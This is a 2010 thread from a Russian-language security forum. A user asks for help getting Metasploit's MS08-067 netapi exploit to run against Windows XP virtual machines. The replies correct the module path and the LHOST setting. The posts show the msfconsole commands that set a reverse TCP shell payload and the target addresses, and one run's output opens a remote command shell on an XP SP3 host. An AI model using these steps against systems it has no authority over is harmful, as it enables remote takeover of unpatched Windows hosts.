ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Metasploit (Ubuntu) не могу найти MS08-067_netapi
  #1  
Старый 07.06.2010, 00:33
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию Metasploit (Ubuntu) не могу найти MS08-067_netapi

Собрал из исходников метасплоит на убунте, ввожу в консоль (msfconsole) выбор эксплоита, но почему-то он не находится, в чём дело? Ведь он есть в /msf3/modules/exploits/windows/smb/
Код:
msf > use MS08-067_netapi
[-] Failed to load module: MS08-067_netapi
НОВЫЙ ВОПРОС НИЖЕ!

Последний раз редактировалось Ru}{eeZ; 07.06.2010 в 01:39..
 

  #2  
Старый 07.06.2010, 00:44
rap1t
Познающий
Регистрация: 06.01.2009
Сообщений: 60
Провел на форуме:
1191310

Репутация: 78
Отправить сообщение для rap1t с помощью ICQ
По умолчанию

ты сам ответил на свой вопрос
Код:
use exploit/windows/smb/ms08_067_netapi
 

  #3  
Старый 07.06.2010, 00:52
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

Цитата:
Сообщение от rap1t  
ты сам ответил на свой вопрос
Код:
use exploit/windows/smb/ms08_067_netapi
спасибо большое! а я пробовал полный путь указывать)
 

  #4  
Старый 07.06.2010, 01:38
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

Новый вопрос:
Почему я не могу получить доступ к системе (поставил на вирт. машину голый Windows XP SP2 RU)? На ней нет никаких заплаток.
Код:
[*] Started reverse handler on 127.0.0.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
[*] Selected Target: Windows XP SP2 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
До этого:
Код:
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp

msf exploit(ms08_067_netapi) > set RHOST 172.31.34.250
RHOST => 172.31.34.250

msf exploit(ms08_067_netapi) > set LHOST 127.0.0.1
LHOST => 127.0.0.1

Последний раз редактировалось Ru}{eeZ; 07.06.2010 в 01:41..
 

  #5  
Старый 07.06.2010, 03:17
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы
 

  #6  
Старый 07.06.2010, 17:45
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

Цитата:
Сообщение от overxor  
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы
Спасибо, теперь получилось)

Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:
Код:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian[*] Selected Target: Windows XP SP2 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Exploit completed, but no session was created.
Атакую юзаемый Windows XP SP3 - атака проходит:
Код:
[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian[*] Selected Target: Windows XP SP3 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010

Microsoft Windows XP [������ 5.1.2600]
(�) ��௮����� ����������, 1985-2001.

C:\WINDOWS\system32>
Почему так может быть?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ